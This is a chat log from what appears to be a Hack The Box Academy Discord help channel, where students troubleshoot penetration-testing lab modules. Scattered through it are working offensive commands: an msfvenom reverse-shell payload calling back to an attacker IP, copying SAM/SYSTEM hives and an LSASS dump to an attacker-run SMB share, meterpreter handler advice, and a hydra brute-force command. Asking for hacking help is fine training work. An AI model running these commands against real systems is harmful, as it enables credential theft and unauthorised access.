#modules
lemme try with my own
Try it with the other domain.
its in progress but its slow
almost there
Hello man I have a problem, I must exec this tool but there isn't a possibility to update and to have my library
it went back
Installed windows with dual boot on mac. Hating macos till this day. Couldnt run most of my c# programs in college without changing stuff.
Hello
I searched the directory but it is not here
We can start by downloading the appropriate binaries to our attack host to perform this attack.
Pls guys I have successfully accessed the script but I’m still struggling with the right script to automate going through each module one after the other, or if someone has an easy method to get the hidden flag please let him or her help me, this is user7 of the Windows command line skills assessment 🙏🏻
its still stuck
Hi im on the “initial enumeration” section on the Active Directory module where we should use xfreerdp into a user so we can scan the network with wireshark, nmap but i cannot get xfreerdp to work since the section only gave me a username (htb-student) and an ip address of (172.16.5.0/23), what do i do?
Try HTB_@cademy_sdnt! or Academy_student_AD!
Otherwise check the current or previous pages and try one of those passwords.
Hi. im on the linux privilege escalation module, think im being stupid but im on the first question (enumerate the host and look for interesting files that might contain sensitive data). Been on it for 30mins tried to access anything i can think of and anything the modules mentioned so far and i have nothing. Anyone got any ideas?
you can grep for the flag. think about how the pattern or format of the flag will be like.
Surely theres a better way to do it than that? And i cant just grep throughout the whole system can I? Wouldnt i have to know which file its in etc?
Can someone help me with the section "Weak Public/Private Keys" in the "Attacking Authentication Mechanisms" module?
I have completed the module and the skill assessment, except for the "Weak Public/Private Keys" section. I followed all the instructions but it doesn't work. Any help is very much appreciated.
why not?
you can just redirect the stdout to discard the errors.
the flag you are looking for might not be your generic "flag.txt" or "666somethingflag.txt"
So i can just do grep "*flag.txt" 2>/dev/null ?
no, you are using grep to search for strings in a file.
Yeah thats what i mean, ive searched across the whole system but cant seem to find a file that would provide me the flag. I could do grep "HTB*" if i knew the file right?
*if you knew how the format of htb flags are.
grep is used to search for the pattern of a string within let's say a file.txt.
find is to search for files named file.txt
Yeah i get that, but I cant find any files where the flag would be in, i cant see how grep is going to help me with that since ive looked through the files manually and cant find a flag
maybe you are not adding the correct switches.
grep -irl
the options are explained in the command line, or in the article ^
Im not sure you understand my issue, the whole thing is the question asks to enumerate the system to find interesting files which may contain a flag. I've gone through all the ones its mentioned in the module so far (not many since this is the first question) and any more i can think of from other modules ive done. Nothing comes up. I dont wanna cheese it and use grep since thats clearly not the point of the question
this is one of those sections where trying everything shown out there won't get you the answer ¯_(ツ)_/¯
and using grep is not cheesing
i see, so the only way to do it is to use grep? but then also how am i meant to know what file the flag will be in using the find command doesn’t give me anything? sorry im making this difficult
you wont, that's why you are using grep.
you can read my earlier msgs, if the flag was named flag.txt, you can just use find.
you will know the file name and the loc, after grep has searched for the format of the flag.
hey i am new. i was thinking of taking SOC path. but its specified as medium difficulty. i am noob. where do i start for SOC?
just think of how the format of htb flags are.
and use it in; grep -irl "xxx" / 2>/dev/null
so from the home directory i do grep -irl “HTB” 2>/dev/null?
thanks for pointing it out, no it should be
grep -irl "xxx" / 2>/dev/null
It will start from the root directory, you can issue it anywhere.
I see ill give that a shot and see how i get on thank you
Linux privilege escalation -- skills assessment: need to get flag 4 and 5. I have credentials for the Tomcat application but i cannot find a way to exploit it (war files dont upload, MSF modules didnt work). Anyone a nudge?
That hasnt worked i just ended up with an insanely huge list of paths?
You are probably generating a wrong payload with msfvenom.
What was your command?
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.168 LPORT=1337 -f war -o revshell.war
grep -irl "HTB" / 2>/dev/null
Use the one here #modules message
take a look at the SOC Analyst Prerequisites skill path
The string HTB can be contained in a lot of files
i would also do Information Security Foundations
What next character usually comes after that in the flag?
Add it.
got it now, so is the only way to do this question by using grep?
thanks youve been so helpful
Not the only way, but this is a simple regex.
I see, feel like that question could be worded differently. When its specifically asking to enumerate for interesting files that might contain sensitive data youd assume it wouldnt be in a filename that isnt interestingly named
Yup, one of “those” sections.
Fingers crossed the rest of the module isnt like this, one of the bad things about HTB is the modules have no consistency in quality between them
The module is nice, it’s just a poorly worded question I think.
Something I experience a lot; magic questions that take sometimes long before you understand what they are asking. Luckily there is a good support here 🙂
i'd argue interesting file contents can have equally interesting file names, e.g., password.txt has a password in it, and you can easily find that by doing find / -name '*password*'
Yeah true, but in this particular sec, the file name was changed too lol
😦
unless you add with awk or something,
Hey y'all, got a question about prereqs for y'all. Sorry for the many words.
Been working towards a different certification (not on HTB) and was unsatisfied with their training materials, so decided to switch my primary learning platform to HTB for the rest of the info I needed for that cert. So I'm picking and choosing stuff from the CPTS path to learn, making sure I understand the stuff covered in the listed prereqs for each module before starting.
So, I was working through "Pivoting, Tunneling, and Port Forwarding", and everything was going super well until I got rather stuck on one question in the "Skills Assessment" section. When I checked the hint, it referenced ||LSASS|| which is something I've not touched on at all quite yet. I figured learning about that subject would come in modules about Active Directory, which are not listed as prereqs to this module, and come much later in the CPTS path.
Is there some prereq I didn't see and that I'm missing, or something I misunderstood about knowing "what I should know" before getting started on a module? Or is this something that should be adjusted to help with students' expectations?
@soft cedar Hate to be asking again so soon, but the next question asks for the latest version of python on the target. I do python3 -VV and get 3.8.10 but apparently this is wrong?
Yeah, there’s a prereq found in Password Attacks module.
Ahhhhh, gotcha. Thanks a bunch; didn't figure I'd find that there, but that makes sense!
iirc I used find to search for the python3 path or strings maybe.
Got it, that hint helped thank you
Morning all, has anyone done this section
It would be easier for people to help if you just ask your question.
The hardest section in all the CPTS xD
Hey folks, I'm stuck at Password Attacks - Medium Lab. I've got the zip file and a couple of usernames but I've had no success with password cracking so far. Could you please give me a nudge here? Let me know if I can DM you if you have completed this lab.
Find a way to crack the zip.
Hi guys ! i m working on htb academy introduction to file inclusion and on the automated scanning section i found the unique flag present but it doesnt work. (i m a beginner but i've played htb for some hours now and i think this is a bug) Can someone help me ? 😄 thanks a lot !
https://academy.hackthebox.com/module/233/section/2554 for this section, splunk is not loading at all. tried yesterday and today, and it isn't working for my friend either
splunk is loading for leveraging windows event logs though
Not a fan of Citrix Breakout section in Windows Privesc module... Making me real angry, hope the rest of you are having a better Tuesday than I am.
My condolences
It's possible that box is used for a different section along with what you're currently doing or accidentally left there from some other use.
Or if you are certain it's the correct flag make sure there are no extra spaces and it's formatted correctly.
Can I PM anybody about Attacking Common Services / Attacking DNS?
I can't get subbrute to work after resetting the box. Looked through every other response here and feel like an idiot rn
I am using pwnbox
Put the ip in the resolvers file or w/e it's called
Make sure it's the resolvers for subbrute, should be the same directory.
someone check out if their splunk loads https://academy.hackthebox.com/module/233/section/2554
Target IP:8000 not working in the zeek but working in the windows event logs section
are the labs not working?
downloaded new vpn and restarted the machine several times I'm on windows privilege escalation interacting with users
yeah seems my target isn't spawning either, but a different module
Don't use eu-academy-exams-1 if you were using that
which module is this
under maintenance
that is splunk with windows under the zeek section
nvm, my target spawned after a few minutes
maintenance is on 16/4 no?
Contact fb
interesting comment
dont click that link people
did you try https?
https works
ok good
got it
what did i miss?
the link too 
free steam?
idk some facebook thing
nah, hack my facebook account shit
crypto?
facebook account recovery
facebook "account recovery"
Second one got deleted as I replied to it
i dont got cwee i don't know how to do website stuff
well it's illegal anyway
You don't need cwee to do website stuff
But also hacking and doing account "recovery" is illegal
bloke sent me a friend request
20 week streak 
6 more, then there's the next badge
I'm actually running out of modules to cheese with, time to do more 
yeah i ve been speaking with an admin and i accidentally swapped machine from academy to lab machine and retrieved the flag from htb lab 😛 at least that s cool !!
https://academy.hackthebox.com/module/143/section/1486
need help: stuck on at this section. for context I study on my work computer.. at work. and other times at home. So my notes are split up and not ideal i know. the write up here uses "wley" to change "damundsen" password. I tried following exactly that but "damundsen" either doesnt exist or I am missing wley's password. OR im supposed to use ||"forend"|| user from the previous section? either ways im assuming im missing ||forend|| or wleys password right?
using that first line in PS "$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force" .. <PASSWORD HERE> actually needs a password.
Usernames and passwords are reused in this module
That section is a walkthrough, so you will need wley's password
thanks guys! I dont have notes for that section on my work computer
You use the creds of the user to authenticate that you are who you say you are to authorize the password change
gotta redo a section to gain wleys password
I suggest using a sync method like pushing to a private gitlab/github instance for notes
ive never tried writing my notes there but I should start
The part of Python in this section : https://academy.hackthebox.com/module/145/section/1343 is to explain how SSTI works in Jinja2?
Because I just used a tool to have a shell.
Hi in Active Directory Enumeration & Attacks (Module) : Initial enumeration of the domain (Section),
the command : "kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users" is used to enumerate for valid users.
But the -o flag or the --output doesn't seem to work. Further down when i cat the file nothing seems to be in the file "valid_ad_users".
Should i restart my session or should i reinstall the tool on attack host (attack01)?
is there a way to read what I wrote for "$Cred" in powershell?
Echo $Cred
Thanks ❤️
Does the file exist?
okay new error, WARNING: [Set-DomainUserPassword] Unable to find user 'damundsen'
hello, i'm stuck at the attacking SAM in Password Attacks Module. I tried to get the system.save by many ways with no luck, even i connect my windows to OVPN try to copy from share folder
, any hints?
What ways to extract files from the victim system to your host have you learned about in this module?
yes, it's smb, i also tried something like ftp but alway network error
Are you connected to the target in any way?
Are you using the pwnbox or a vpn connection?
yes, evil-winrm also no luck
Why are you not using rdp?
my ping to the pwnbox always over 200+, i cant
Do you have a local vm set up?
yes
So connect via VPN to the academy network then RDP to the target host.
Then leverage the tools and techniques you have been taught in the module.
Sure you can do it but it is just as easy to just follow the instructions of the module.
Well yeah
tried
Is that the sharename and such?
that's example from AI
Well AI doesn't know wtf it's doing
You can't replace critical thinking with AI
Using xfreerdp, add /drive:name,/tmp/
i went to the mount point, when i use "cp" command, my VM was frozen in about 5 mins then i turn off my VM
Many ways like smbserver, u can even straight up do python web server and just put the file on ur server
Mate, they literally give you everything that is needed in the module. Just read it again from the top.
using iwr
like the module itself literally walked you through how to do it
And you'll see the <name> pop up in the file explorer

It is move not "cp" but "move".
cp works in powershell
Spin up the smb server with impacket then move the files to smb share via cmd and "move" command. That's it.
Ofc it does but he should stick to what the module is teaching as he is already having trouble with that.
move system.save \\10.10.x.x\CompData
i tried this first, in about 1 hour then respawn the target, no luck...
i think the size of file is problem
It's not the size of the file
Did you open an smb share named CompData
Moving the file will take less than 10 seconds.
ls and curl does too. I think curl in powershell is basically an alias for Invoke-WebRequest
Actually, the first method works, but it keeps having connection errors during the file transfer process and leads to the file not being completely transferred (I compared the file size and the transferred file is still in protected when using rm) but lost connection, I've been trying continuously for hours, it's tiring
yep so does wget, they're just aliasing similar ps cmdlets to the linux equivalent
these completely work:
C:\> move sam.save \\10.10.15.16\CompData
1 file(s) moved.
C:\> move security.save \\10.10.15.16\CompData
1 file(s) moved.
but the last was not
ssh in my guy
I tried compressing it directly on windows its size was only 2.2 mb but still the same
Because you need to ssh to the target
Again: it's not the filesize lol
I was able to do the raw file just fine
i did that and 20 is still not correct
is the command i use correct?
If you’re ssh in, that command would be fine ig
But then you have to answer it correctly still
No localhost, and ipv4 only
Look at the ports too. You have services using tcp and tcp6. Each service will bind to its own unique port.
does that mean "NO LOCALHOST"... "SELECT IPV4 ONLY"
.
?
look above at what i said
It means exactly what I said
I'm able to get the answer pretty easily
maybe take a look at what the question is asking
It means those not listening on loopback or ipv6
bruh. even this didnt work: netstat -l| grep -v "localhost" | wc -l
Bruh, loopback is also 127.0.0.1
And in netstat it will show as the ip, not name
this didnt work either: netstat -tuln| grep -v "localhost|127" | wc -l
|
*netstat -tuln| grep -v "localhost|127" | wc -l
\ escape 
Wrap the command in backticks
theres an absence of forward slash but i used it
Try just evaluating the output without wc
Because it looks like it's also counting ipv6
Which the question explicitly tells you only ipv4
(Not on localhost and only ipv4
Has anyone done the new Orion prolab?
In seriousness, get rid of your wc, and count them manually, you're looking for tcp, and not tcp6, and IPs of 0.0.. or the IPs of the box
Wrong channel my dude I don't think there's a channel for it yet but you can read and follow #welcome to access more of the server
but arent ipv6 addresses 16bits blocks? im not seeing 16 bit blocks in the list
ips of 10.0.0 is good right?
i apologize to everyone
this was the error....
i never read it.. just saw error
dont block me
Possibly, I don't remember which module/section you are working on and if it's a fundamentals I don't have notes for it.
just count all 0.0.0.0 and ignore udp
well, you can see this as an opportunity to improve the usability of the site
make the error say " MODULE ERROR" instead lol
Ipv6 are 1111:2222:3333:4444..., loopback on ipv6 is ::1
Anytime you see :: it's an implied 0000
https://academy.hackthebox.com/module/145/section/1346
I am trying to inject ||SSTI|| because it's a ||python server|| and should use ||flask|| but I tried some payloads to test if I was in the good direction but no one works for this type of vuln. By the way, I tried to use a tool (||SSTIMap||) but nothing as well (default level).
Moreover, in the module we have ||2 args/parameters|| and the final test tell us this : ||"without register an account"||, but I tried to see something in the different ||POST|| request (||register and login||) but only ||register|| was showing the something correctly if we spam it with same values, but no vuln discovered, I don't know what to do :(.
And it can span any number of sets
ahhh i see
So 1::1 would be 1:0000:0000:0000:0000:0000:0000:1
Also: according to standard there can only be one :: in an ipv6 set
So you can have 1::2:0000:0000:3
But not 1::2::3
Convention is to truncate the longest stretch of 0
i see. :: can be 3, 4, 5 or 2
perfect explanation there. so much knowledge
Should just watch a tutorial on networking
basic networking stuff ¯_(ツ)_/¯
ive taken the cisco course on network fundamentals
Retake it
Well fundamentals are important
u kno what funny. I started doing the pen test job path, then someone recommended i go for linux fundamentals. So i began doing that, and now yall telling me to go back to network fundamentals
when i start doing that, theres gonna be someone telling me to go back to ABC fundamentals lol
If someone know 🥺.
I surrender
You need network and Linux fundamentals. Actually there should be a fundamental path on academy
Not sure in what order they do it, but I’d work through that
It's like halfway down that list
u sure u set up the smb correctly?
I think I was right, because I was able to get sam.save and security.save
this pentesting thing was a lot easier in uni. Literally scored a distinction
Well it likely wasn't as in-depth
I will try hashdump with metasploit
which module u doing?
Why hashdump?
Secretsdump works fine for sam and security saves
it was very fun. had to perform various attacks to get into a target system
Again: likely not as in-depth
^
I want to experience everything they mentioned in the module, it seems impossible
And sounds like potentially they just gave you attacks and commands they run
Sometimes you can't do everything from the module, but I don't recall using hashdump for this section
I've barely touched metasploit except where it was explicitly the only showcased option
all that for a fancy degree
That's worth little-to-nothing
Have you ever tried this module? Did you get the system.save file?
Well I looked at the forum and imo it's...disappointing.
If you followed the section it should have had you create a sam, security, and system iirc
System isn't always required but sam and security are
sadly so
Just checked: it's literally the first thing it has you do is create a sam, system, and security.save file
bro is stressed
I suggest taking a break
I'm under the shells module and am trying to get the version of Powershell running on pwnbox to answer the challenge via $PSversiontable and am getting back 7.2.1
Am I missing something?
Well, thank you guys, maybe I was thinking too much, I'll simplify it with crackmapexec
edition, not the version
^
Reading: 1 :: UriEl: 0
MMMM_ ,..,
"_ "__"MMMMM ,...,,
,..., __." --" ,., _-"MMMMMMM
MMMMMM"___ "_._ MMM"_."" _ """"""
""""" "" , \_. "_. ."
,., _"__ \__./ ."
MMMMM_" "_ ./
'''' ( )
._______________.-'____"---._.
\ /
\________________________/
(_) (_)
Have a bonsai tree 😛
can someone help me with unfied

Not here
Read and follow #welcome to access #starting-point
kk
Ayo wat
Froginnablender.
thanks
Banned
Yea
:/
I've had this issue too
Bypassing Blacklisted Commands
hey some one can help me to this section in command injection module
Hi guys! I hope you're well. I'm trying to use Responder with Pwnbox. RDP into target. RDP won't work from Kali for some reason and Pwnbox has port 80 in use. I tried to kill it but no joy. Is this a thing? I'd really love to use Responder right about now 😄
I'm on Interacting With Users, Windows Priv Esc
Trying for some malicious SCF action
Nevermind. I'm a silly sausage.
sure what's up
thanks bro but i did it
Can I DM someone to get a second set of eyes for my payload on the Http Attacks skill assessment
question, im doing the sqlmap essentials module Running SQLMap on an HTTP Request. so on the last question it says its vuln to sqli in a json value. im just looking if there is a better way to get the json request and how would we know to check for the json before hand bc this just tells you its in a json request. i went into burp since i couldnt find the json via curl
nvm nvm im just being dumb lol
1 to go
hello I'm very new to htb academy and im currently going through path infosec foundations.
Do I really need the windows and linux pentest environment that are set up in the modules?
More specifically, later introductions modules like "bash scripting" require these VMs setup?
I thought pwnbox would suffice, as a beginner, but maybe its better to set them up for the long run(?)
Practical Digital Forensics Scenario
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.
On this question we are supposed to look at the link itself or the process mentioned on the module? because I look it up like windows.pslist. windows.cmdline and the encoded command can't find anything useful... I am missing something here?
the link is for reference, it has a list of tools to choose from
check interesting logs that could be related to the execution of PowerShell commands
The fundamentals cover more than the pwnbox and labs. They are broad fundamentals for windows and Linux and basic scripting
got it, thanks
I recently switched from windows to Linux. It literally feels like I broke out the matrix. Linux so much better and has so much more mercy on my low RAM PC.
linux is like reading the matrix code
Yes I still have much more to learn. But so far I never knew I could love an operating system this much. I love Linux as much as I love my puppy.
Long Live Linux!
https://academy.hackthebox.com/module/143/section/1489
if im understanding this correctly, I need to move 'secretsdump.py' to the parrot host on 172.16.5.225? I tried looking for it there but dont see it. My attack host (vm) cant see 172.16.5.255... unless section wants me to use port forwarding?
@dire abyss nope the parrot host already has secretsdump. The attack hosts in this module already have the required tools
Also you can access the parrot host via ssh on the target
yeah I ssh'd with powershell and have it up right now from MS01
im not in deep, let me respawn
You can open powershell then ssh
You don't need to respawn
alright about to clock out from work, ill jump back on from home, thank you
am i doing this wrong? trying to get the flag for julio
Never had this problem before but I cant RDP to a target. Wondering if anyone can tell what I am doing wrong. I've also reset all machines. ──╼ [★]$ xfreerdp /v:10.129.19.50 /u:Administrator /p:AnotherC0mpl3xP4$$
[01:53:49:913] [5042:5043] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[01:53:49:913] [5042:5043] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[01:53:49:114] [5042:5043] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[01:53:49:114] [5042:5043] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[01:53:49:114] [5042:5043] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[01:53:49:114] [5042:5043] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
Try remmina
remmina? I hardly know her.
(looking into this)
Oh... gui
interesting
Well I'll be... that worked
hrm... I wonder why xfreerdp is broken
says logon error
maybe do xfreerdp /v:10.129.19.50 /u:Administrator /p:'AnotherC0mpl3xP4$$'
the target is not spawning for https://academy.hackthebox.com/module/176/section/1791
was on this module trying to progress despite the latency when it seems to suddenly crash. respawning the target left me waiting for the past 20 minutes.
Hello! I'm having trouble with this, I get what you're saying to convert the time and all that, I just have no idea where this stuff goes in the reset_token_time.py script and the module gives ZERO help on it, just assumes i know where stuff goes in the code. Any help on this would be awesome thanks!
remmina > xfreerdp 😛
Looks like a problem with certificate, I had an old lab machine that gave me a cert error and using the option /cert-ignore it worked, try it
Skill issue
You're so original 😁
People like you are why I love this field, truly.
Hahaha I just prefer xfreerdp
I don't.
It doesn't work most of the time. I have better things to do than troubleshoot broken tools.
afaik xfreerdp works just fine out of the box
It's not broken, maybe you have bad version or there's some missing library
In my machine it just perfect
🤷‍♂️
is it worth doing the infosec fundamentals path before the cpts path or does the cpts path teach you the fundamentals?
it was what pixelrazer said, he didn't have the password in quotes and it has chars linux ignores
It gets down to basics pretty thoroughly.
Depending on what you're referring to.
It's incredibly thorough, I'll say that much.
infosec fundamentals path has stuff like intro to windows and linux, intro to command lines, intro to networking, intro to AD, a lot of intros and i think all the fundamental modules
idk how much of that is covered by cpts
and idk if i want to spend my time on the infosec fundamentals path before i do cpts if the cpts path is just going to cover all of it anyway
Oh neat. Yeah if you don't know Linux or how to use a shell...
I would probably do that first.
i mean there’s a lot of it i already know
i might just skip around the infosec fundamentals path
actually it probably couldn’t hurt
the infosec fundamentals path is a prerequisite to the cpts path
so you're expected to know everything from that path
if you're not up to snuff, perhaps you should do it
will do, thanks
Nibbles -initial footprinting
Gain a foothold on the target and submit the user.txt flag
i know that there is an admin.php under /nibbleblog/admin.php but how can i login? use hashcat? i know the username credential, which is admin
didn’t you learn a basic reverse shell in that module? i would try that. i dont think hashcat is used for that lab
but i haven't logged in to the page yet to access the plugin tab
i dont think you dont need to login, you need to enumerate more.
well you'll need some basic python knowledge for this, the conversion needs to be done once to set the now variable
How long time I am supposed to wait? https://academy.hackthebox.com/module/57/section/491
Good day, can someone point me to help me ask this question. List the server carefully and look for the flag.txt file. Please submit the contents of this file in response. module -> Footprinting
what section and what are you stuck on
Hello, is there anyone that could give me a little hint about xss assessment? I think I'm doing everything right, but I can't get the cookie. I found the vulnerable field, I found the correct payload, and I can see traffic on my php server, but there is no cookie saved.
Of course tried like 15 different payloads to get the cookie
Is it only me who is having issues to move files to the windows vm in advanced deserialization attacks module?
Specifically the debugging .net apps where I am supposed to load the given website in a iis but the machine is extremely unstable and rdp connection dies every minute or so 🤔
guys how i can earn htb cubes cause im stayed at 30 cubes (im beginner)
Each module can unlock a certain amount of cube ( answering to questions and task) or you can buy them in the academy shop.
footprinting easy lab
Make an educated guess based on the box name
It's also given in the section
I also do not understand why for example the same payload works for the 5 times in a row, and then stops working and suddenly I can't see traffic on my php server. Not gonna lie - im getting frustrated, because I really think there is something off about the vm
With money
@killnet_edc not long 2 minutes max
And I need $10000
same
Why do you "need" Amazon cards?
Because
You can buy them on amazon
i have no moneys
then you can't get them
wrong server
ahh
HTB should start making amazon cards giveaway
-s
Does anyone know what I could have done to block incoming connections to Kali? I have UFW but even disabled, I can't catch revshells on tun0. Can't use simple server to host. I've tried testing it using the same address from the same machine and everything works right. I think UFW did something that I can't find/undo.
Hey everyone, hope I am in the right place for this question:
I just started with HackTheBox and am currently on the "Redeemer" level, which requires me to access a Redis DB by using "redis-cli -h <IP>".
After running that command, nothing happens - my console seems stuck trying to connect and I have to opt out with control + c.
Any idea what the issue could be? I am using the Parrot OS.
My nmap scan also took unusually long (around 20 seconds) compared to the previous levels I did.
The IP in question is 10.129.32.193, in case that helps.
This channel is for htb academy modules, #starting-point is for the starting point machines, read and follow #welcome to access it
Apologies 🙂
can you post a Screenshot of your payload? im assuming it a valid payload since it worked 5times already
Pls Post a screenshot and the name of the module

Guys i spawned the Citrix Break exercise from Win privesc module . For the past 15 min it doesn't give me an ip , just spinning forever 
Hey, there is this one question in "Scanning Services", where it asks for software version of application running on 8080. However, the intended way doesn't work since nmap doesn't recognize the version, and the version from fingerprint does not work
Try the name of the service 
With 2 words

ayee that's it, thanks!
It's looking for the answer in the "version" column
right, but that one is empty for 8080
Well I was waiting for more than 15 min...
hey i am on sqlmap essential case 5 , i get the flag but it broken in to htb{blah_blah}_blahblah}
what should i do
What did you do to get it?
Sometimes it's dumb from what I remember, but you got the answer yeah?
yep I got it, thanks 🙂
help
Try with curl and not the file.
😭
its been a while since i did this, every thing looks good except -p flag is that necessary cuz you already gave a request file right? idk just double check on that
i am getting a flag but its not getting accepted by module
hint of question is :You can use the option '-T flag5' to only dump data from the needed table. You can use the '--no-cast' flag to ensure you get the correct content. You may also, try running the command a few times to ensure you captured the content correctly.
Send me in DM your flag.
Why isn't it correct?
edition, not version
I used a translation program and totally missed it.
how u did those red lines
try to do it from pwnbox
its fast for network related task
Probably ~ 30 minutes. Maybe it's set up to allow more threads
hmm t is very less
-t 4 because it's SSH.
try it from pwnbox
I am doing it.
Multiple threads allow parallel attempts
I know the password but would like to get it myself...
for me hydra never took more than 3-4 min
Just be patient
Grep for the right password with grep -n "<password>" to see what line it's on to get a gauge how long it may take
I know the line of the valid password.
Then you can do some light math to see how long it may take, line #/#triesperminute
👍
Well the password is good, thx :).
i always try with max t
You generally don't wanna do that. At best (in a normal scenario) your ip gets blocked, at worst you dos the server
it's a tool called flameshot, you can take a screenshot and then easily edit it
nah i was talking about in modules
Don't get in the habit of doing things poorly
if i don't do that in module it would take 30+ min coz of 180+ latency
Again. Don't let yourself form bad habits just because
yes
Last time it took me 15min to scan an IP. Cooked myself something nice while i waited

I am trying with the "normal" port for FTP but I had to reset before so I did not see if it was good, it should be 21 or the default port of the lab?
Well, not working as well.
Could be that you're using too many threads
With the default or 21 xd?
Either
Okay :).
Some threads look like they died so didn't finish resolving
Maybe but I did a big error, I fixed it :), thx.
For the labs, 48 threads tends to be the most stable
Anyone available for sparring on ADCS skills assessment? Want to understand what I am missing as I go through this assessment, as I am stuck in the beginning portion and have made my way through several attempts of ESC8 and ESC11. thanks in advance!
Why I am getting a lot of ... ||user|| accounts?
hydra -l ||user|| -P Desktop/wordlists/rockyou.txt xxx -s xxx http-post-form ||"/xlogin.php:xx=^USER^&xx=^PASS^:F=<form name='lo-gin'"|| -I https://academy.hackthebox.com/module/57/section/515
Probably because your fail is drunk
if it's esc8/11 then coerce and relay
😭
I will not, and my reply was a hint
I just placed wrongly ONE character bro...
Thanks..
quick question, when setting WPAD record , every machine traffic get proxied to our attack machine even if the AD network was firstly unaccessible directly to us?
Hi all, is there any way to delete the answers for academy modules's sections? I want to retake the entire path and I would like to go blind again with it. Is it possible?
Just refollow the path but don't look at the flag for each section?
hello, im stuck here: Attacking LSASS
i could not get the lsass.dmp file to my attackbox, tried many ways
Can you elaborate more, I don't understand the question ?
Which error do you get?
C:\Users\htb-student\AppData\Local\Temp\share>move ".\lsass.DMP" "\10.10.15.26\share"
An unexpected network error occurred.
0 file(s) moved.
No \\10.10.15.2\share
Okay, did you setup the smbserver ?
sure, like in the module, i tried with ftp still no luck
hey guys!
was it unauthenticated?
does this server teach hacking?
sudo impacket-smbserver -smb2support share .
is this okay?
Try with -username user -password pass
set it with a username and password.
can anyone tell me?
hey!
Yess
I think that's not a problem, I can transfer the files from the previous lesson about a few tens or hundreds of kbs, but the file system.save and this lsass.dmp are about a few dozen mbs so it's not possible.
Use http
Tried it, timeout was too long
ig Hashdump is different than lsass
What do you mean ?
Hackthebox has modules for teaching but they arent for illegal stuff like how to hack into my friends computer or how to hack a discord.
Hackthebox can teach you/prepare for cybersecurity related jobs
my thinking, check the net user then ...
I’m talking about how you can transfer lsass
sorry if it was wrong
He means Hashdump from metasploit
where do i start?
Yeah and you replied him that’s it’s a different thingy
yes, the question to get user's password hash then crack it
I used msf to download the lsass when I did that section.
I was also getting timed out by other methods.
Have you done that part yet? Could you please check it for me, how did you get that lsass.dmp, am I going in the wrong direction?
Oh so you have the same problem?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I already told you.
I have a latency problem so I couldn’t use smb / https
@shadow cargo
Craft a meterpreter payload and send it to the target and catch the shell via msf multi handler
I mean if the smb didn't work, just use metasploit
thank you, guys
Can I dm you about something else?
Me, yes ofc
Thanks.
thanks!
Hi, on the page https://academy.hackthebox.com/module/143/section/1265 , it says "A penetration testing distro (typically Linux) as a virtual machine in their internal infrastructure that calls back to a jump host we control over VPN, and we can SSH into." what does it mean by "calls back". Sorry not very clear on the network terminology
connects to
ohh ok, thanks
Good evening, I was wondering if this file contains expect (which handles interactive streams) expect://id This is not echoed in this experimental environment
That's why I use Linux xD
I never thought I would have to take this way
. Should I write a support ticket?
Idts
Disappointed in my self I had to get a hint for attack web service easy. I did not foresee using load file 😩😩😩😩😩😩
It happens
That was def left of field
is anyone else facing this error while trying to install a module in drupal from attacking common applications
increase the timeout
you can background the session and do ;
sessions -i 1 --timeout 50 replace the 1 with the session number.
Maybe he can increase timeout is smbserver too, idr if there is an option in smbserver
for options I am not sure, maybe in the source code.
Well, apparently that impacket-smbserver doesn't have a timeout option
its for meterpreter.
There's -t in smbclient
to create snapshots you need vmware pro right ?
it works... when i set timeout to 120
damn 120 💀
this is so long...
hey, are there any discounts for silver annual subscription?
does everyone pay 490$?
1mb/1min
its around ~45mb iirc
lol to me, did it take you that long?
guys i hate to ask but does anyyone know how to hack steam acc
i will explain later
the download? think so.
What args should I add? https://academy.hackthebox.com/module/80/section/772
I added the URL to the page :
Thanks for your idea, @soft cedar , I think I need to rest a bit 
I have to give a file name but I have still these errors, I just replaced vars to parameters in the page and setting the url (no .php file by default).
Maybe problem from pwnbox, use your own vm

https://academy.hackthebox.com/module/80/section/782
I would love some help with the second question on this module
I managed to decode the remember me cookie
But i cant encode it after editing it help please
Is that not a Rule break?
Well I looked at the page of https://academy.hackthebox.com/module/80/section/772 but the csv about ||Scada|| is strange...I mean we have not something like ftp-betterdefaultcredentials.txt in default-credentials of seclists, does there is a link to download the valid one to have username:password?
Not just you, I have the exact same problem!
two people having the same issue? hmmm 🤨
I am having an issue with the Password attack Lab Hard , I am using Hydra to brute force the RDP with the given Username , But I get different Passwords from Hydra Each time and none of them is working with xfreerdp.
Any help would be appreciated
hello guys im new here maybe my english not that good, i just wanna know do anyone have recommendation which modules should i learn to learn as red team android?
is it the login brute force module?
nvm
found it i was blind
Yep , The Hard Lab
use crackmapexec instead of hydra
Tried it with no luck , Used the mutated pass list with the custom rule and still
with the pwnbox, I cannot transfer lsass.dmp using the suggested method too
Someone please... https://academy.hackthebox.com/module/80/section/772
Hello Everyone,
I'm doing the IDS/IPS module
https://academy.hackthebox.com/module/226/section/2416
Currently stuck in one single problem, on Snort Rule Development I'm tasked with with finding the keyword needed.
I've found the keyword to get the packets alert, but the same keyword is not the answer for the question in the academy.
Anyone able to help?
I posted it in the forum, in an already open thread in the same topic
hi how can i start
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
OMG! You got #r00t!
No, I'm just kidding 🙂
You have been blocked bacause you tried to do something funny to our platform.
??
🤷
??
maybe try a different browser ¯_(ツ)_/¯
Or disable adblock or other third party software
its not worked
its not worked too
Someone please :/ 😭.
is there anyway to access port 22 on a mobile network? i cant complete the ssh module it no response on port 22 when i connect at home i have no problems
sorry bro i never done that module T-T wish i can help ya
some one help me please
